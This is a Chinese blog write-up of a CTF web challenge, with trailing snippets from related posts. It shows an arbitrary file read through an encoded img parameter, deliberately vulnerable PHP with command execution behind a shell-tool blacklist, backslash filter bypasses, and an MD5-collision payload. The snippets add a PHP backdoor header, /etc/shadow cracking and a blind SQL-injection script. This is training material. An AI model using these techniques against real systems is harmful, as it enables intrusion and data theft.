青少年CTF训练平台Easy_Web

原创 已于 2024-12-18 23:08:42 修改 · 711 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2023-04-17 13:57:47 首次发布
文章描述了一次通过分析网页源码、Base64解码和MD5碰撞来绕过安全限制并获取Flag的Web安全挑战过程。作者首先发现页面源码中含有MD5相关线索,接着通过两次Base64解码得到文件名,并利用PHP代码中的条件判断和命令执行漏洞,最终成功读取到Flag。

首先发现f12大法发现源代码内存在md5 is funny ,怀疑此题跟md5有关

继续观察URL发现URL后面的img参数有点像base64编码

 Base64 在线编码解码 | Base64 加密解密 - Base64.us

解密后发现还是base64加密,二次解密获得:3535352e706e67 这个看着有点像16进制

转换一下结果为555.png

 接下来试着包含一下index.php

把Index.php 进行16进制编码  两次base64编码获得:TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

替换到img参数中 然后把图片的地址进行base64解码 即可成功获得Index.php源码

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

关键部分:

if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

绕过preg_match可以使用\绕过 例如:ca\t 

观察这段代码 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))    a和b的内容不一样并且md5值需要相等

发现为MD5碰撞且对数据进行了String强制类型转换

绕过:

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

利用hackbar构造Post请求包发送数据包

发现页面没有显示md5 funny 代表绕过成功

接下来构造cmd后面的参数 l\s ../../../ 发现flag

然后用cat命令读一下flag就好了

青少年CTF训练平台 Web-Easy PingMe02
xingjinhao123的博客
10-22 1825
青少年CTF训练平台 Web-Easy PingMe02
青少年CTF训练平台-WEB-部分wp
SwBack的博客
04-04 3448
扫描发现备份文件 打开发现flag直接上传,然后获取flag木马地址,通过扫描目录发现。直接添加请求头user-agentt: zerodiumsystem(‘cat /flag’);连接之后,查找具有权限的命令根据提示直接发现flag 提示说明没有中文但是仍然错误,查看shadow,通过john破解密码 用户名后有$y,则表明密码已使用 yescrypt 进行哈希处理指定format参数 新手的登录 使用提示的user账号登录之后抓包修改cookie为admin。发包,得到flag访问之后直接查看js
EasyCTF-2014:EasyCTF
06-30
易建联 EasyCTF 2014 的 EasyCTF 平台
青少年 CTF 练习平台:Misc(一)
Flag少侠的博客
05-24 9044
Bear(熊日解码)、表情包、神奇的压缩包、Whale、小光的答案之书、是我的 Hanser!、上号、多情、我们的秘密、仓鼠的窝
青少年CTF训练平台 Web-Easy POST&GET
xingjinhao123的博客
10-17 717
青少年CTF训练平台 Web-Easy POST&GET
青少年CTF平台-Web-PingME
zxsctf的博客
10-09 1715
题目难度一颗星,五十分。
青少年CTF训练平台 SSH01-04
xingjinhao123的博客
08-08 584
青少年CTF-取证
Web青少年CTF擂台挑战赛 2024 #Round 1 wp
uuzeray的博客
03-01 3118
好家伙,比赛结束了还有一道0解web题是吧(随缘写点wp(简单过头,看个乐就好)
青少年CTF-EasyMD5
CTF
03-08 912
打开容器后发现类似于文件上传,先尝试,发现会提示不是 pdf格式的文件,还提示文件过大,最后提示你知道MD5碰撞吗?利用生成器生成两个MD5值相等的pdf文件上传即可。
青少年ctf练习平台--做题wp(1)
RanQ的博客
05-03 801
界面为终端页面,flag一般在主路径下,我们使用cat 查看文件cat /flag。
青少年CTF训练平台 Web-Easy 登陆试试
xingjinhao123的博客
12-02 1598
青少年CTF训练平台 Web-Easy 登陆试试
青少年CTF平台-Web-POST&GET
zxsctf的博客
10-09 684
一星简单题,看我如何给你过了。启动环境,等待三十秒先喝口水。
青少年CTF训练平台Web签到
Fenghe2的博客
04-17 372
随后用dirsearch 扫了一下目录发现index.php.bak备份文件。访问index.php.bak成功获得flag。burp抓包看了看响应头 也什么都没发现。打开页面f12大法 什么都没发现。
青少年CTF-Web-Robots
zxsctf的博客
10-08 1186
题目名称:Robots题目描述:昨天十三年社团讲课,讲了Robots.txt的作用,小刚上课没有认真听课正在着急,你能不能帮帮忙?题目难度:一颗星。
[青少年CTF练习平台]MISC—— Write UP
个人文章分享
10-14 3614
青少年CTF训练平台(QSNCTF)misc方向的题解。
青少年CTF Crypto-Easy Morse WP
weixin_55265137的博客
10-11 561
青少年CTF Crypto-Easy Morse WP
青少年CTF-Misc-1
weixin_53226786的博客
07-02 1302
然后把能尝试的操作都操作了一编,然后思考很久想起来了,jpg图片文件可以通过steghide工具,然后这下面又多了一串,尝试用steghide进行解密得到flag。用010editor发现文件尾越看越奇怪,然后看上面grep过滤出来的数据,难不成是原本是flag.zip被倒叙了变成了piz.flag,010查看,发现有伪加密,而且还多了个文件头,直接把上面文件头删除,就可解压。tysec{mealibertasmeuscanor}得到一堆2d2d的数据,根据提示,猜测是摩斯和培根密码,尝试解密。
青少年CTF-SSTI
weixin_49803180的博客
04-04 1409
在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的,因为wrapper是指这些函数并没有被重载,这时它们并不是function,不具有__globals__属性。python的object类中集成了很多的基础函数,我们想要调用的时候也是需要用object去操作的,主要是通过__mro__ 和 __bases__两种方式来创建。|attr()为jinja2原生函数,是一个过滤器,它只查找属性获取并返回对象的属性的值,过滤器与变量用管道符号( | )分割.%}1{% endif %}
青少年ctf-random(梅森算法-MT19973)
yuqie的博客
06-14 1460
这道题的漏洞在于这个函数: MT19973算法能生成1-623个32位随机数,而我们有 (32/32+64/32+96/32)*104=624个已知随机数,那么我们就完全可以求出下一个随机数。这里生成的一组数据里分别是32位、64位、96位,这里我们只需要32位,所以需要把64位和96位的数分成两个或者三个32位数,可以用它们与32位全为1的二进制数来分离。这里可以直接引用RandCrack库,将已经生成的624个数按顺序传入RandCrack函数里,利用predict_getrandbits来计算出下
青少年CTF easy_sqli 使用手工盲注
最新发布
06-22
### 手工SQL盲注技巧在CTF中的应用 在CTF比赛中,`easy_sqli` 类型的题目通常涉及通过手工SQL注入或盲注来获取数据库中的敏感信息。以下是关于如何使用手工SQL盲注技巧解决此类问题的详细说明。 #### 1. 确定注入点 首先需要确认是否存在SQL注入漏洞。可以通过以下方式测试: - 尝试输入特殊字符(如 `'` 或 `"`)并观察页面是否返回错误信息。 - 如果页面返回错误,则可能表明存在SQL注入漏洞[^1]。 #### 2. 判断字段数量 使用 `order by` 语句判断查询结果的字段数量。例如: ```sql http://example.com/?id=1 order by 3-- ``` 如果页面正常显示,则说明查询结果至少有3个字段;若报错,则减少数字继续测试,直到找到最大不报错的数字[^3]。 #### 3. 使用布尔盲注确定数据库名 布尔盲注通过条件判断来逐步猜测数据库名称。例如: ```sql ?id=1 and substr(database(),1,1)='s'-- ``` 上述语句用于判断数据库名的第一个字符是否为 `s`。如果页面正常显示,则说明条件成立;否则条件不成立[^2]。 #### 4. 爆破表名和列名 一旦确定数据库名,可以使用类似方法爆破表名和列名。例如: ```sql ?id=1 and substr((select table_name from information_schema.tables where table_schema='ctftraining' limit 1),1,1)='f'-- ``` 此语句用于判断数据库 `ctftraining` 中的第一个表名的第一个字符是否为 `f`[^1]。 #### 5. 获取数据 在确定目标表和列后,可以进一步爆破具体数据。例如: ```sql ?id=1 and ascii(substr((select flag from supersqli.1919810931114514 limit 1),1,1))=115-- ``` 上述语句用于判断 `flag` 字段的第一个字符的ASCII值是否为 `115`(即字符 `s`)。通过不断调整位置和字符值,逐步拼接出完整的数据。 #### 6. 时间盲注(可选) 如果布尔盲注不可行,可以尝试时间盲注。例如: ```sql ?id=1 and if(ascii(substr((select flag from supersqli.1919810931114514 limit 1),1,1))=115,sleep(5),0)-- ``` 此语句会在条件成立时使服务器延迟5秒,从而判断条件是否正确[^4]。 #### 示例代码 以下是一个简单的Python脚本,用于自动化布尔盲注过程: ```python import requests url = "http://example.com/login.php" flag = "" for pos in range(1, 50): # 假设flag长度不超过50 for char_code in range(32, 127): # ASCII可打印字符范围 payload = f"' or (ascii(substr((select flag from supersqli.1919810931114514),{pos},1))={char_code})--" data = {'uname': payload, 'psw': '1'} res = requests.post(url, data=data) if "Login successful" in res.text: # 根据成功标志判断 flag += chr(char_code) print(f"[+] Current flag: {flag}") break print(f"[+] Final flag: {flag}") ``` ### 注意事项 - 在手工盲注过程中,需要耐心地逐位爆破字符。 - 需要熟悉SQL语法以及常见的数据库元数据表(如 `information_schema`)[^5]。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值